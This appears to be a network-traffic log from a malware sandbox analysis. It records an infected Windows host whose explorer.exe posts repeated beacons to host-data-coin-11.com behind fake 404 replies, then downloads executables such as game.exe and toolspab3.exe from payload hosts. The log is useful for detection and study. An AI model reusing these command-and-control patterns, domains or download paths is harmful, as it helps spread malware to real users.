11          192.168.2.3  49766        95.213.165.249   80                C:\Windows\explorer.exe

Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:38.590396881 CET  3031                OUT        POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gbbxygekjk.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 231
Host: host-data-coin-11.com
Dec 1, 2021 10:04:38.693572044 CET  3074                IN         HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:38 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
12          192.168.2.3  49768        95.213.165.249   80                C:\Windows\explorer.exe

Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:38.789549112 CET  3109                OUT        POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://namawqf.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 308
Host: host-data-coin-11.com
Dec 1, 2021 10:04:38.896084070 CET  3116                IN         HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:38 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
13          192.168.2.3  49770        95.213.165.249   80                C:\Windows\explorer.exe

Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:39.015736103 CET  3117                OUT        POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://smpro.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 200
Host: host-data-coin-11.com
Dec 1, 2021 10:04:39.116993904 CET  3119                IN         HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                14192.168.2.34977195.213.165.24980C:\Windows\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Dec 1, 2021 10:04:39.205468893 CET3121OUTPOST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ieqswdu.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 234
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:39.306132078 CET | 3122 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49774 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:39.407718897 CET | 3125 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://vneyujlfl.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 255
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:39.507246017 CET | 3127 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.3 | 49776 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:39.595597982 CET | 3128 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://viqgctnic.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 234
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:39.694449902 CET | 3134 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.3 | 49778 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:39.815232038 CET | 3137 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://xpkskgrr.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 205
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:39.920986891 CET | 3139 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.3 | 49779 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:40.013690948 CET | 3141 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://kdyponywr.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 344
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:40.118258953 CET | 3154 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:40 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.3 | 49780 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:40.222048044 CET | 3176 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://rxdwffwjbf.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 136
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:40.321014881 CET | 3177 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:40 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49750 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:26.243459940 CET | 1097 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://jmuwhyhn.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 316
                                                                                                                                                                                Host: host-data-coin-11.com
                                                                                                                                                                                Dec 1, 2021 10:04:26.347946882 CET1098INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:26 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
20          192.168.2.3  49782        95.213.165.249  80                C:\Windows\explorer.exe
Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:40.408685923 CET  3179                OUT        POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://molwdgi.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 231
Host: host-data-coin-11.com
Dec 1, 2021 10:04:40.512445927 CET  3182                IN         HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 48 ec a0 8a 70 bc 57 da 4a d4 f6 2e 87 25 eb c3 94 58 23 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 46I:82OU&1UPJ%9HpWJ.%X#c0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
21          192.168.2.3  49786        95.213.165.249  80                C:\Windows\explorer.exe
Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:40.885488987 CET  3223                OUT        GET /files/6096_1638289274_6885.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: host-file-host-3.com
Dec 1, 2021 10:04:40.966351986 CET  3227                IN         HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:40 GMT
Content-Type: application/x-msdos-program
Content-Length: 163328
Connection: close
Last-Modified: Tue, 30 Nov 2021 16:21:14 GMT
ETag: "27e00-5d203f23b200e"
Accept-Ranges: bytes
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELS_Bt*`@@vx[Dxua@`d.textP@B `.rdata~`F@@.data`us@.fefegru@@.guyuspu@`.venuu@`.rsrcu@@3D$@6U,ESV0@W3=PEuWW


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
22          192.168.2.3  49799        95.213.165.249  80                C:\Windows\explorer.exe
Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:43.433692932 CET  3849                OUT        POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gghke.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 189
Host: host-data-coin-11.com
Dec 1, 2021 10:04:43.534595013 CET  3849                IN         HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:43 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
23          192.168.2.3  49801        95.213.165.249  80                C:\Windows\explorer.exe
Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:43.629026890 CET  3852                OUT        POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dpsjrby.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 224
Host: host-data-coin-11.com
Dec 1, 2021 10:04:43.731081009 CET  3854                IN         HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:43 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
24          192.168.2.3  49803        95.213.165.249  80                C:\Windows\explorer.exe
Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:43.826879978 CET  3856                OUT        POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mlwynhpbb.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 272
Host: host-data-coin-11.com
Dec 1, 2021 10:04:43.933253050 CET  3857                IN         HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
25          192.168.2.3  49805        95.213.165.249  80                C:\Windows\explorer.exe
Timestamp                           kBytes transferred  Direction  Data
Dec 1, 2021 10:04:44.026300907 CET  3858                OUT        POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://njupmvh.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 168
Host: host-data-coin-11.com
Dec 1, 2021 10:04:44.125761032 CET  3860                IN         HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:44 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 30I:82OU&1UPJ$dP0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.3 | 49808 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:44.522725105 CET | 3864 | OUT | GET /game.exe HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: host-file-host-3.com
Dec 1, 2021 10:04:44.605958939 CET | 3866 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:44 GMT
                                                                                                                                                                                Content-Type: application/x-msdos-program
                                                                                                                                                                                Content-Length: 351744
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Last-Modified: Wed, 01 Dec 2021 09:04:02 GMT
                                                                                                                                                                                ETag: "55e00-5d211f48282b5"
                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$OW.9P.9P.9Ph`P.9PXP.9PXP.9PXPy.9PVP.9P.8P.9PXP.9PXP.9PXP.9PRich.9PPEL_@@@pE(@00@l.text `.data@@.rsrc@B@@.reloc;0<"@B4JZl


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.3 | 49814 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:46.816389084 CET | 4236 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://mjghwr.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 346
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:46.913688898 CET | 4249 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:46 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.3 | 49815 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:47.279380083 CET | 4253 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://unuta.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 254
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:47.379863024 CET | 4254 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:47 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.3 | 49816 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:47.469691992 CET | 4255 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://fucabofxh.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 197
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:47.572196960 CET | 4256 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:47 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49751 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:26.750736952 CET | 1099 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://piyyyphtem.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 257
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:26.852677107 CET | 1100 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:26 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.3 | 49817 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:47.663691044 CET | 4257 | OUT | POST / HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://guasgjf.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 247
                                                                                                                                                                                Host: host-data-coin-11.com
Dec 1, 2021 10:04:47.766128063 CET | 4257 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                Date: Wed, 01 Dec 2021 09:04:47 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 46I:82OOj{CUg%XQAc}yc0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.3 | 49818 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:47.901993036 CET | 4258 | OUT | GET /downloads/toolspab3.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: privacytoolzforyou-7000.com
Dec 1, 2021 10:04:47.983998060 CET | 4260 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:47 GMT
Content-Type: application/x-msdos-program
Content-Length: 336896
Connection: close
Last-Modified: Wed, 01 Dec 2021 09:04:01 GMT
ETag: "52400-5d211f4808eb5"
Accept-Ranges: bytes
                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$OW.9P.9P.9Ph`P.9PXP.9PXP.9PXPy.9PVP.9P.8P.9PXP.9PXP.9PXP.9PRich.9PPEL_@@@n(@08@l.text> `.data@@.rsrc@B@@.reloc;<@B(6J^l"4


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.2.3 | 49820 | 95.213.165.249 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Dec 1, 2021 10:04:51.255196095 CET | 7116 | OUT | POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bfwtp.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 110
Host: host-data-coin-11.com
Dec 1, 2021 10:04:51.352677107 CET | 7117 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.20.1
Date: Wed, 01 Dec 2021 09:04:51 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
